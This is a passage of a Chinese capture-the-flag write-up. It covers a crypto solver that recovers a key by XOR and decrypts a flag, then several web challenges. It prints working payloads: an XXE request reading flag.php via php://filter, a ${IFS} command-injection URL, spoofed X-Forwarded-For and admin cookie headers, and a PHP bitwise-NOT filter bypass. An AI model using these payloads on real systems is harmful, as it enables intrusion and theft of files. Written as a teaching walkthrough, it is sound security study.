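    # first 8 are used below, so the padding never reaches the key; kept as
    # in the original, confirm whether raw[-n:] was intended.
    raw_last = pad(raw_last)
    print(raw_last)

    # 通过iv 和 密文 和 原文 可以算出 key
    # key byte = cipher ^ chaining value ^ plain.  The original searched
    # 0..255 for each byte; the XOR equation has exactly one solution, so
    # this gives the same t_key.
    t_key = [two[k] ^ iv[k] ^ ord(raw_last[k]) for k in xrange(8)]
    print(t_key)

    with open('flag.txt.encrypted', 'rb') as f:
        # bytearray indexes to ints, so no ord() is needed on file bytes.
        prev = bytearray(f.read(8))
        flag = ''
        for _ in xrange(24):
            enc = bytearray(f.read(8))
            for k in xrange(8):
                flag += chr(prev[k] ^ t_key[k] ^ enc[k])
            prev = enc

    print(flag)

exit()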

Web

XX

  • 源码泄漏 index.php~,Xxe 利用
    POST /index.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: zh-CN
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 119.61.19.212:8083
    Proxy-Connection: Keep-Alive
    Pragma: no-cache
    Content-Length: 225

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php" >]>
    <creds>
    <user>&xxe;</user>
    <pass>111</pass>`</creds>

ping

  • 利用ifs绕过空格,利用/flag绕过flag
http://119.61.19.212:8081/index.php?A=a;grep${IFS}fla${IFS}/fla*

小明拒绝

  • 头部加上
X-Forwarded-For: 127.0.0.1
Cookie: admin=1

php

  • 利用取反
<?php
/**
* Created by PhpStorm.
* User: y0unge
* Date: 2019-09-09
* Time: 17:30
*
* Prints the URL-encoded bitwise NOT of the string literal, which the
* write-up then pastes into the request shown below it.
*/

//echo (~urldecode("%8F"));
echo urlencode(~"GetYourFlag");

生成取反的exp

即可

view-source:http://119.61.19.212:8082/index.php?code=(~%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)();

找漏洞

  • 存在注入,可以读出信息

  • 密码明文

  • 模板注入,需要上传模板,由于没找到key,采用爆破的方式访问注入的页面

API

  • 扫描目录发现

  • 直接有flag

  • 常规思路应该是Api目录爆破file参数,读到hack.php文件代码,hack.php写文件